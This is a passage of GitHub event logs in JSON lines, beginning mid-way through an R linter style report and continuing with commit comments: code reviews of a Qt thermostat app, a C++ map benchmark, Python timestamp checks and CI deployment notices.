plot_longitudinal_labels(axis.rads[i], outer_radius, r.labs[i], l.labs[i], \n                                                                                  ^\n```\n[R/plotting_functions.R:389:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L389) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Useful for making the falciform process look more smooth and refined. This is purely aesthetic.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:390:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L390) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @details enhance the resolution of a polygon vertices dataframe by creating a spline along each vertex.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:391:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L391) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param xy vertices in dataframe with x and y columns, in order (not all are used).\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:398:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L398) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @references http://gis.stackexchange.com/questions/24827/how-to-smooth-the-polygons-in-a-contour-map\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:407:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L407) *style:* **Variable or function name should be snake_case.**\n```r\n​    data.spline <- spline(1:(n + 2 * k), data[, 1], n = vertices, ...)\n    ^~~~~~~~~~~\n```\n[R/plotting_functions.R:411:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L411) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n"}},"created_at":"2018-07-01T01:18:42Z"}
{"id":"7902264902","type":"CommitCommentEvent","actor":{"login":"merky1"},"repo":{"name":"merky1/PiClock"},"payload":{"comment":{"id":29556120,"position":null,"line":null,"path":null,"commit_id":"283cfeb7c12f42d8b9827f032b23c2b7377496c2","created_at":"2018-07-01T01:19:50Z","updated_at":"2018-07-01T01:19:50Z","author_association":"OWNER","body":"Fix #7 "}},"created_at":"2018-07-01T01:19:50Z"}
{"id":"7902272464","type":"CommitCommentEvent","actor":{"login":"wmww"},"repo":{"name":"wmww/Hedgehog"},"payload":{"comment":{"id":29556137,"position":392,"line":138,"path":"wayland/XdgShellV6Surface.cpp","commit_id":"5788cea8903adf180d38d37df67d175f9e757495","created_at":"2018-07-01T01:28:29Z","updated_at":"2018-07-01T01:28:29Z","author_association":"OWNER","body":"I don't even want to know how you found this."}},"created_at":"2018-07-01T01:28:29Z"}
{"id":"7902272966","type":"CommitCommentEvent","actor":{"login":"GustavoKikey"},"repo":{"name":"pdroaugust/waytickets"},"payload":{"comment":{"id":29556138,"position":null,"line":null,"path":null,"commit_id":"2010d2ea04149daff337a17c20f7fc3f9acbd7f2","created_at":"2018-07-01T01:29:05Z","updated_at":"2018-07-01T01:29:05Z","author_association":"COLLABORATOR","body":"Tem algumas coisas nesse update que dependem de outras classes pra funcionar direito, nos próximos commits eu atualizo elas"}},"created_at":"2018-07-01T01:29:05Z"}
{"id":"7902277332","type":"CommitCommentEvent","actor":{"login":"AkramHusain"},"repo":{"name":"AkramHusain/HelloWorld"},"payload":{"comment":{"id":29556149,"position":null,"line":null,"path":null,"commit_id":"563c16706cb2f5fb7c23016ec68eb9f622d0f509","created_at":"2018-07-01T01:34:15Z","updated_at":"2018-07-01T01:34:15Z","author_association":"OWNER","body":"okay"}},"created_at":"2018-07-01T01:34:15Z"}
{"id":"7902280313","type":"CommitCommentEvent","actor":{"login":"manick02"},"repo":{"name":"apache/kafka"},"payload":{"comment":{"id":29556155,"position":5,"line":207,"path":"core/src/main/scala/kafka/tools/ConsoleProducer.scala","commit_id":"01bc3a41ffb6dc4210bbaf15ab9ba512079b64c8","created_at":"2018-07-01T01:37:28Z","updated_at":"2018-07-01T01:37:28Z","author_association":"NONE","body":"SsSa SIusr S ESG d"}},"created_at":"2018-07-01T01:37:28Z"}
{"id":"7902289632","type":"CommitCommentEvent","actor":{"login":"MarcusVinix"},"repo":{"name":"MarcusVinix/introducao_javascript"},"payload":{"comment":{"id":29556166,"position":1,"line":1,"path":"README.md","commit_id":"e005317322d6b0ae852d75420f16c821ab3b357a","created_at":"2018-07-01T01:48:13Z","updated_at":"2018-07-01T01:48:13Z","author_association":"OWNER","body":"Exercícios do curso do Alura"}},"created_at":"2018-07-01T01:48:13Z"}
{"id":"7902290728","type":"CommitCommentEvent","actor":{"login":"iisadiq90"},"repo":{"name":"iisadiq90/s999999999"},"payload":{"comment":{"id":29556171,"position":null,"line":null,"path":null,"commit_id":"349af0a4d1650faf90a8a6b2142edc08e3707a82","created_at":"2018-07-01T01:49:31Z","updated_at":"2018-07-01T01:49:31Z","author_association":"OWNER","body":"master"}},"created_at":"2018-07-01T01:49:31Z"}
{"id":"7902291112","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29556172,"position":57,"line":57,"path":"Remittance.sol","commit_id":"03cf0e0b4bb827982c57d32bbc4e70cfe039f844","created_at":"2018-07-01T01:49:58Z","updated_at":"2018-07-01T01:49:58Z","author_association":"NONE","body":"Let's see how you forward the funds to the receiver. There is trickiness to unfold. "}},"created_at":"2018-07-01T01:49:58Z"}
{"id":"7902292600","type":"CommitCommentEvent","actor":{"login":"iisadiq90"},"repo":{"name":"iisadiq90/s999999999"},"payload":{"comment":{"id":29556174,"position":null,"line":null,"path":null,"commit_id":"71811e37a2bb98a80127b2ad7ebe4d9d91793e2f","created_at":"2018-07-01T01:51:52Z","updated_at":"2018-07-01T01:51:52Z","author_association":"OWNER","body":"master"}},"created_at":"2018-07-01T01:51:52Z"}
{"id":"7902297350","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/natureTours"},"payload":{"comment":{"id":29556182,"position":8,"line":21,"path":"index.html","commit_id":"07af9d3685a2e9d7a5bd46da37f68bc5db540a26","created_at":"2018-07-01T01:57:44Z","updated_at":"2018-07-01T01:57:44Z","author_association":"OWNER","body":"wrapped heading text within <div> so i could style entire heading since heading was divided into <span> so style separately."}},"created_at":"2018-07-01T01:57:44Z"}
{"id":"7902297897","type":"CommitCommentEvent","actor":{"login":"alejahndro02"},"repo":{"name":"alejahndro02/proyecto-alejandro"},"payload":{"comment":{"id":29556183,"position":null,"line":null,"path":null,"commit_id":"7fb0aca12cbe10b29bcab499d38495e070809a8e","created_at":"2018-07-01T01:58:21Z","updated_at":"2018-07-01T01:58:21Z","author_association":"OWNER","body":"prueba\r\n"}},"created_at":"2018-07-01T01:58:21Z"}
{"id":"7902298822","type":"CommitCommentEvent","actor":{"login":"JosephKorso"},"repo":{"name":"morris/vstools"},"payload":{"comment":{"id":29556184,"position":null,"line":null,"path":null,"commit_id":"9c9b27f9307c9ee3f87e86cef5fd01fbcb86e8e2","created_at":"2018-07-01T01:59:28Z","updated_at":"2018-07-01T01:59:28Z","author_association":"NONE","body":"Amazing work.\r\nIt's possible to export OBJ?\r\nI have no idea how to do it."}},"created_at":"2018-07-01T01:59:28Z"}
{"id":"7902770888","type":"CommitCommentEvent","actor":{"login":"hgareeballa"},"repo":{"name":"udacity/reactnd-UdaciFitness-complete"},"payload":{"comment":{"id":29557328,"position":null,"line":null,"path":null,"commit_id":"1cc6fd9ce59e9acf6012aa5800b872ac98b5e209","created_at":"2018-07-01T10:00:08Z","updated_at":"2018-07-01T10:00:08Z","author_association":"NONE","body":"AppLoading did not work for me !\r\ndo i need to install any ting first !?\r\n"}},"created_at":"2018-07-01T10:00:08Z"}
{"id":"7902771921","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"MPOS/php-mpos"},"payload":{"comment":{"id":29557331,"position":null,"line":null,"path":null,"commit_id":"c8e23ec4c38f9e9cc54e354d678ea382629db1ab","created_at":"2018-07-01T10:00:49Z","updated_at":"2018-07-01T10:00:49Z","author_association":"NONE","body":"c8e23ec"}},"created_at":"2018-07-01T10:00:49Z"}
{"id":"7902773180","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557333,"position":21,"line":208,"path":"thermostat/timeline.cpp","commit_id":"370a31119dd032698ebb077e9b6f65e7e669b366","created_at":"2018-07-01T10:01:46Z","updated_at":"2018-07-01T10:01:46Z","author_association":"NONE","body":"Secondo me è meglio rendere `const` il `QVector`, è vero che lo usi te ma vuoi essere sicuro che nessuno te lo modifichi."}},"created_at":"2018-07-01T10:01:46Z"}
{"id":"7902774821","type":"CommitCommentEvent","actor":{"login":"DrThum"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29557335,"position":5,"line":852,"path":"src/server/game/Entities/Pet/Pet.cpp","commit_id":"7a006adadf1dc77e2ec7ec10b0ba1b5e9ce7988c","created_at":"2018-07-01T10:03:06Z","updated_at":"2018-07-01T10:03:06Z","author_association":"NONE","body":"Ninja un-fix!"}},"created_at":"2018-07-01T10:03:06Z"}
{"id":"7902775266","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557336,"position":29,"line":49,"path":"thermostat/main.qml","commit_id":"370a31119dd032698ebb077e9b6f65e7e669b366","created_at":"2018-07-01T10:03:27Z","updated_at":"2018-07-01T10:03:27Z","author_association":"NONE","body":"Questi due valori sono superflui, perché gli offset sono sempre a 0."}},"created_at":"2018-07-01T10:03:27Z"}
{"id":"7902776528","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29557342,"position":null,"line":null,"path":null,"commit_id":"e6c367137b5bac902c0fccd23238325e39fb2857","created_at":"2018-07-01T10:04:27Z","updated_at":"2018-07-01T10:04:27Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-217](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-217).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-217-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-01T10:04:27Z"}
{"id":"7902777238","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557344,"position":38,"line":77,"path":"thermostat/main.qml","commit_id":"370a31119dd032698ebb077e9b6f65e7e669b366","created_at":"2018-07-01T10:05:00Z","updated_at":"2018-07-01T10:05:00Z","author_association":"NONE","body":"Giusto una cosa di stile: cerca di raggruppare gli elementi che sono logicamente \"uniti\", per esempio le `anchors` è bene che stiano vicine così non rischi di perdertene una."}},"created_at":"2018-07-01T10:05:00Z"}
{"id":"7902777982","type":"CommitCommentEvent","actor":{"login":"fceller"},"repo":{"name":"arangodb/arangodb"},"payload":{"comment":{"id":29557345,"position":217,"line":334,"path":"arangod/Scheduler/Scheduler.cpp","commit_id":"3e8ff88eb2120a248e813ca7bf43b2d606a8c07c","created_at":"2018-07-01T10:05:34Z","updated_at":"2018-07-01T10:05:34Z","author_association":"MEMBER","body":"The idea is to have one queue for client requests. Only if there are too many V8 request in flight, start queuing."}},"created_at":"2018-07-01T10:05:34Z"}
{"id":"7902779491","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29557346,"position":null,"line":null,"path":null,"commit_id":"cf84c7300e0ea5114c765f34869b44e525375fa6","created_at":"2018-07-01T10:06:52Z","updated_at":"2018-07-01T10:06:52Z","author_association":"CONTRIBUTOR","body":"boost::unordered_map явно быстрее был. Но std::unordered_map иногда оказывался медленнее, чем std::map"}},"created_at":"2018-07-01T10:06:52Z"}
{"id":"7902779603","type":"CommitCommentEvent","actor":{"login":"LordVenom"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29557347,"position":null,"line":null,"path":null,"commit_id":"2c1c5831fe18caed34a19abef1d9e0ccf540c667","created_at":"2018-07-01T10:06:59Z","updated_at":"2018-07-01T10:06:59Z","author_association":"COLLABORATOR","body":"Non mais tu peux le faire pas de soucis.Juste 2 chose\r\n\r\nfrom resources.lib.handler.hosterHandler import cHosterHandler inutile a virer\r\nimport xbmc inutile a virer\r\n\r\nVérifier si tes import sont utiliser tu fait un recherche sur xbmc et tu verras qu'il n'est pas apeller dans le fichier de plus si tu en a besoin fait : \r\n\r\nfrom resources.lib.comaddon import progress, xbmc voir le fichier comaddon pour plus d'info.\r\n"}},"created_at":"2018-07-01T10:06:59Z"}
{"id":"7902780122","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29557348,"position":null,"line":null,"path":null,"commit_id":"bd3ad48734cc4347487a979c676431bde76cd01d","created_at":"2018-07-01T10:07:26Z","updated_at":"2018-07-01T10:07:26Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-218](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-218).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-218-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-01T10:07:26Z"}
{"id":"7902780718","type":"CommitCommentEvent","actor":{"login":"wish7code"},"repo":{"name":"openbmap/radiocells-nlp-android"},"payload":{"comment":{"id":29557349,"position":44,"line":81,"path":"src/org/openbmap/unifiedNlp/SettingsActivity.java","commit_id":"b944a0656833248f91d2e721ca9b0ff4991b7d11","created_at":"2018-07-01T10:07:54Z","updated_at":"2018-07-01T10:07:54Z","author_association":"MEMBER","body":"At least for LineageOS, Android takes care of App Name (guess this is the same in all ROMS):\r\n\r\nOn my device I see the default permssion request:\r\n\r\n**Radiocells UnifiedNLP provider** wants to access location, Allow/Deny?\r\n\r\nThe toast you mentioned is only displayed if user rejects (and in this case he has seen just seconds before in the default dialog)"}},"created_at":"2018-07-01T10:07:54Z"}
{"id":"7902781236","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557351,"position":29,"line":49,"path":"thermostat/main.qml","commit_id":"370a31119dd032698ebb077e9b6f65e7e669b366","created_at":"2018-07-01T10:08:20Z","updated_at":"2018-07-01T10:08:20Z","author_association":"NONE","body":"Te lo scrivo qui perché non so in che commit è entrato ma ho visto che in `main.qml` hai creato un `Item` con `id: manager` che usi per accedere alle property di `Manager` ma non ti serve, puoi accedere direttamente a `Manager.intTemperature` quando vai a settare la property di un `Item`."}},"created_at":"2018-07-01T10:08:20Z"}
{"id":"7902781965","type":"CommitCommentEvent","actor":{"login":"NathanSweet"},"repo":{"name":"libgdx/libgdx"},"payload":{"comment":{"id":29557352,"position":null,"line":null,"path":null,"commit_id":"2bca8e5b4f9724673523410d30cdb7908f3c4c9a","created_at":"2018-07-01T10:08:59Z","updated_at":"2018-07-01T10:08:59Z","author_association":"MEMBER","body":"Thanks, I'll add a note to changes. It's rare Table gets any changes at all and it is a little scary. If you find a reasonable layout this breaks, it would be helpful to see example code that reproduces it.\r\n\r\nThe layout that prompted the change was a table with a row that was another table with expand. When the outer table width was < min width, the whole table zoomed off to the right. This really didn't make sense and ended up being negative \"extra\" space being distributed to the columns, which I think is conceptually wrong."}},"created_at":"2018-07-01T10:08:59Z"}
{"id":"7902782970","type":"CommitCommentEvent","actor":{"login":"mirraaj"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29557354,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T10:09:53Z","updated_at":"2018-07-01T10:09:53Z","author_association":"CONTRIBUTOR","body":"Have you used the MountainCar-v0 environment to generate the previous result? There is a difference in the award magnitude among the results you have presented."}},"created_at":"2018-07-01T10:09:53Z"}
{"id":"7902783525","type":"CommitCommentEvent","actor":{"login":"vibo"},"repo":{"name":"ecrona/horse-bet"},"payload":{"comment":{"id":29557355,"position":null,"line":null,"path":null,"commit_id":"9e92408988f8388f8552ec4e4a29bc6ea5f54c9b","created_at":"2018-07-01T10:10:19Z","updated_at":"2018-07-01T10:10:19Z","author_association":"COLLABORATOR","body":"Bust it!\r\nMaybe we can use a little hash instead"}},"created_at":"2018-07-01T10:10:19Z"}
{"id":"7902785269","type":"CommitCommentEvent","actor":{"login":"cris391"},"repo":{"name":"magortako/shoe-shop"},"payload":{"comment":{"id":29557357,"position":null,"line":null,"path":null,"commit_id":"2fa808ba2d876882b488d2ccb3827d6078b6492b","created_at":"2018-07-01T10:11:47Z","updated_at":"2018-07-01T10:11:47Z","author_association":"COLLABORATOR","body":"very good arash :D"}},"created_at":"2018-07-01T10:11:47Z"}
{"id":"7902786553","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29557359,"position":null,"line":null,"path":null,"commit_id":"cf84c7300e0ea5114c765f34869b44e525375fa6","created_at":"2018-07-01T10:12:43Z","updated_at":"2018-07-01T10:12:43Z","author_association":"CONTRIBUTOR","body":"![image](https://user-images.githubusercontent.com/13867290/42133301-5f09641e-7d30-11e8-8275-800596282bef.png)\r\nХотя в 14 плюсах всё исправили. Ладно, молчу. "}},"created_at":"2018-07-01T10:12:43Z"}
{"id":"7902787066","type":"CommitCommentEvent","actor":{"login":"tolulonge"},"repo":{"name":"tolulonge/QuizApp"},"payload":{"comment":{"id":29557361,"position":null,"line":null,"path":null,"commit_id":"9568b4cf2d93749c345b7bca39826b2711964de5","created_at":"2018-07-01T10:13:06Z","updated_at":"2018-07-01T10:13:06Z","author_association":"OWNER","body":"Project Title \r\n\r\n\r\n \r\nA quiz app to test general knowledge \r\n\r\n\r\n  \r\n\r\n\r\n \r\nThis app has an edit text view that allows user to input name \r\n\r\n\r\n \r\nit has 5 questions, allows user to pick answer and at the end prints out user name, score and an appreciation message \r\n"}},"created_at":"2018-07-01T10:13:06Z"}
{"id":"7902788313","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29557363,"position":null,"line":null,"path":null,"commit_id":"cf84c7300e0ea5114c765f34869b44e525375fa6","created_at":"2018-07-01T10:14:02Z","updated_at":"2018-07-01T10:14:02Z","author_association":"CONTRIBUTOR","body":"Код для теста, если кому интересно: \r\n```cpp\r\n#include <iostream>\r\n#include <string>\r\n#include <map>\r\n#include <vector>\r\n#include <unordered_map>\r\n#include <iomanip>\r\n\r\nstd::map< int, int > std_m;\r\nstd::unordered_map< int, int > boost_m;\r\nstd::vector< int > values;\r\n \r\nconst int N = 1000000;\r\nint main()\r\n{\r\n    int t1, t2;\r\n    for ( int i = 0; i < N; i++ )\r\n        values.push_back( rand() * rand() );\r\n    std::cout << \"insert:\" << std::endl;\r\n    for ( int k = 0; k < 5; k++ ) {\r\n        t1 = clock();\r\n        for ( int i = 0; i < N; i++ )\r\n            std_m[ values[ i ] ] = i;\r\n        t2 = clock();\r\n        std::cout << \"map   : \" << std::setw( 8 ) << (t2 - t1) / (double)CLOCKS_PER_SEC * 1000 << \" ms.\" << std::endl;\r\n \r\n        t1 = clock();\r\n        for ( int i = 0; i < N; i++ )\r\n            boost_m[ values[ i ] ] = i;\r\n        t2 = clock();\r\n        std::cout << \"unordered_map : \" << std::setw( 8 ) << (t2 - t1) / (double)CLOCKS_PER_SEC * 1000 << \" ms.\" << std::endl;\r\n    }\r\n \r\n    std::vector< int > temp( N );\r\n \r\n    std::cout << std::endl << \"size = \" << std_m.size() << std::endl << std::endl;\r\n \r\n    std::cout << \"find[] :\" << std::endl;\r\n    for ( int k = 0; k < 5; k++ ) {\r\n        t1 = clock();\r\n        for ( int i = 0; i < N; i++ )\r\n            temp[ i ] = std_m[ values[ i ] ];\r\n        t2 = clock();\r\n        std::cout << \"map   : \" << std::setw( 8 ) << (t2 - t1) / (double)CLOCKS_PER_SEC * 1000 << \" ms. control : \" << temp[ 42 ] << std::endl;\r\n \r\n        t1 = clock();\r\n        for ( int i = 0; i < N; i++ )\r\n            temp[ i ] = boost_m[ values[ i ] ];\r\n        t2 = clock();\r\n        std::cout << \"unordered_map : \" << std::setw( 8 ) << (t2 - t1) / (double)CLOCKS_PER_SEC * 1000 << \" ms. control : \" << temp[ 42 ] << std::endl;\r\n    }\r\n    std::cout << std::endl;\r\n    std::cout << \"find.find :\" << std::endl;\r\n    for ( int k = 0; k < 5; k++ ) {\r\n        t1 = clock();\r\n        for ( int i = 0; i < N; i++ )\r\n            temp[ i ] = std_m.find( values[ i ] )->second;\r\n        t2 = clock();\r\n        std::cout << \"map   : \" << std::setw( 8 ) << (t2 - t1) / (double)CLOCKS_PER_SEC * 1000 << \" ms. control : \" << temp[ 42 ] << std::endl;\r\n \r\n        t1 = clock();\r\n        for ( int i = 0; i < N; i++ )\r\n            temp[ i ] = boost_m.find( values[ i ] )->second;\r\n        t2 = clock();\r\n        std::cout << \"unordered_map : \" << std::setw( 8 ) << (t2 - t1) / (double)CLOCKS_PER_SEC * 1000 << \" ms. control : \" << temp[ 42 ] << std::endl;\r\n    }\r\n}\r\n```"}},"created_at":"2018-07-01T10:14:02Z"}
{"id":"7902788619","type":"CommitCommentEvent","actor":{"login":"prasanthhs"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29557364,"position":20,"line":241,"path":"webclient/src/main/resources/static/js/workspace/workspace.js","commit_id":"907f9c804f4d25d87c8dd4e3bba6b60d27d5a0f5","created_at":"2018-07-01T10:14:17Z","updated_at":"2018-07-01T10:14:17Z","author_association":"COLLABORATOR","body":"This function is empty now. It should be removed?"}},"created_at":"2018-07-01T10:14:17Z"}
{"id":"7902788628","type":"CommitCommentEvent","actor":{"login":"OhmG-999"},"repo":{"name":"OhmG-999/RideApp"},"payload":{"comment":{"id":29557365,"position":null,"line":null,"path":null,"commit_id":"57b5d46716cc9bbfb70d34d71ca093535801dea7","created_at":"2018-07-01T10:14:17Z","updated_at":"2018-07-01T10:14:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Login from the Registration page](https://trello.com/c/DD2qeE6k/21-login-from-the-registration-page)"}},"created_at":"2018-07-01T10:14:17Z"}
{"id":"7902791141","type":"CommitCommentEvent","actor":{"login":"NowiEnJ"},"repo":{"name":"NowiEnJ/ros_test"},"payload":{"comment":{"id":29557377,"position":null,"line":null,"path":null,"commit_id":"f63ee7d876c2447fe5e22524f4040674846cbfb7","created_at":"2018-07-01T10:16:25Z","updated_at":"2018-07-01T10:16:25Z","author_association":"OWNER","body":"Oka got it"}},"created_at":"2018-07-01T10:16:25Z"}
{"id":"7902792029","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557381,"position":27,"line":211,"path":"thermostat/timeline.cpp","commit_id":"370a31119dd032698ebb077e9b6f65e7e669b366","created_at":"2018-07-01T10:17:10Z","updated_at":"2018-07-01T10:17:10Z","author_association":"NONE","body":"Qui con il `for` C++11 è la morte sua."}},"created_at":"2018-07-01T10:17:10Z"}
{"id":"7902793408","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29557389,"position":null,"line":null,"path":null,"commit_id":"d3c2f03f3e89452c51bb43f57cb8d6ea69ca0887","created_at":"2018-07-01T10:18:19Z","updated_at":"2018-07-01T10:18:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-101818 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-101818\") to [dev](https://console.bluemix.net/apps/d440fd5b-3634-403c-a8b5-3e541b5e78aa?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T10:18:19Z"}
{"id":"7902794499","type":"CommitCommentEvent","actor":{"login":"Kaixhin"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29557392,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T10:19:14Z","updated_at":"2018-07-01T10:19:14Z","author_association":"OWNER","body":"No, this has only been tested on CartPolve-v1. If you look at the [Gym Wiki](https://github.com/openai/gym/wiki/MountainCar-v0#reward), or the [code](https://github.com/openai/gym/blob/master/gym/envs/classic_control/mountain_car.py#L50), you'll see that MountainCar-v0 only has negative rewards. On the other hand, CartPole-v1 has [only positive rewards](https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py#L74-L79) and gets capped at 500 timesteps, hence the saturation of rewards at 500."}},"created_at":"2018-07-01T10:19:14Z"}
{"id":"7902796194","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29557395,"position":19,"line":39,"path":"repondeur/zam_repondeur/views/reponse.py","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T10:20:35Z","updated_at":"2018-07-01T10:20:35Z","author_association":"COLLABORATOR","body":"Not sure I understand the issue. You want the JS code to compare two values, and show a message if one is greater than the other. In the backend we have UTC date times. Any method that converts that to a number should work for that.\r\n\r\nMy understanding is that your method converts the UTC datetime to a time stamp in the local time zone:\r\n```assert int((datetime.utcnow() - datetime(1970, 1, 1)).total_seconds()) == int(time())```\r\n\r\nNot sure that’s what you intended. But again, I don’t think we actually care, and it’s a perfectly valid solution, just not what I would usually do, so I felt like sharing an alternative solution. \r\n\r\nIf you really want an “UTC timestamp”, this should work (my local time is UTC+2):\r\n```\r\nassert int(mktime(datetime.utcnow().timetuple())) + 7200 == int(time())\r\n```\r\n"}},"created_at":"2018-07-01T10:20:35Z"}
{"id":"7902796694","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557396,"position":28,"line":212,"path":"thermostat/timeline.cpp","commit_id":"370a31119dd032698ebb077e9b6f65e7e669b366","created_at":"2018-07-01T10:21:00Z","updated_at":"2018-07-01T10:21:00Z","author_association":"NONE","body":"In generale la `update()` dovrebbe essere chiamata solo se effettivamente è cambiato qualcosa, così ti eviti di far ridisegnare cose inutilmente (stessa cosa per la `updateTimelineMark)."}},"created_at":"2018-07-01T10:21:00Z"}
{"id":"7902796717","type":"CommitCommentEvent","actor":{"login":"zhibeiyou"},"repo":{"name":"zhibeiyou/hexo"},"payload":{"comment":{"id":29557397,"position":18,"line":18,"path":".travis.yml","commit_id":"cdd3df859b3746724ac8f713429b3e552520b621","created_at":"2018-07-01T10:21:01Z","updated_at":"2018-07-01T10:21:01Z","author_association":"OWNER","body":"username配置错误"}},"created_at":"2018-07-01T10:21:01Z"}
{"id":"7902796839","type":"CommitCommentEvent","actor":{"login":"vitalych"},"repo":{"name":"S2E/build-scripts"},"payload":{"comment":{"id":29557398,"position":5,"line":17,"path":"Dockerfile","commit_id":"33be87048a6591ee813bdd95f8f0d4578b6f300e","created_at":"2018-07-01T10:21:07Z","updated_at":"2018-07-01T10:21:07Z","author_association":"MEMBER","body":"I think this is GPL. Can't have that."}},"created_at":"2018-07-01T10:21:07Z"}
{"id":"7902798620","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29557401,"position":9,"line":13,"path":"thermostat/weather.h","commit_id":"046f87c9a684e07b6914e394f63219615af9f547","created_at":"2018-07-01T10:22:36Z","updated_at":"2018-07-01T10:22:36Z","author_association":"NONE","body":"Questi metodi di get li puoi fare `const` in questo modo sai che una chiamata a questi metodi non modifica nulla, quindi verrebbe `double getTemp() const { return _temp; }`"}},"created_at":"2018-07-01T10:22:36Z"}
